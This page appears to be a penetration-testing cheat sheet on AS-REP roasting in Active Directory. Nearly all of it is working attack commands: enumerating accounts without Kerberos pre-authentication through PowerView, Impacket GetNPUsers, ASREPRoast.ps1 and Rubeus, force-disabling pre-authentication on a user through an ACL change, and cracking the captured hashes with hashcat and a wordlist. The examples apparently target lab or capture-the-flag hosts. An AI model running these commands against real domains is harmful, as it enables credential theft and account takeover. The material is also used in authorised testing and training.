AS-REP Roasting

Kerberos Pre-Auth Disabled

Enumerating accounts with Kerberos Pre-auth disabled

Using PowerView (dev):

Get-DomainUser -PreauthNotRequired -Verbose

Using Active Directory module:

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Using Impacket-Tools

impacket-GetNPUsers 'htb.local/' -dc-ip 10.10.10.161 
impacket-GetNPUsers evilcorp.local/ -dc-ip 192.168.23.157 -usersfile usernames.txt

impacket-GetNPUsers 'htb.local/' -dc-ip 10.10.10.161 -request

ASREPRoast.ps1

 . .\ASREPRoast\ASREPRoast.ps1
 
 Get-ASREPHash -UserName VPN1user -Verbose

To enumerate all users with Kerberos preauth disabled and request a has

Invoke-ASREPRoast -Verbose

Rubeus

.\Rubeus.exe asreproast /nowrap

Force disable Kerberos Preauth:

Let's enumerate the permissions for RDPUsers on ACLs using PowerView(dev):

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Set-DomainObject -Identity Control1User -XOR@{useraccountcontrol=4194304} –Verbose

Get-DomainUser -PreauthNotRequired -Verbose

Cracking AS-REP

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

PreviousPassword Spray Attacks NextKerberoasting

Last updated 1 year ago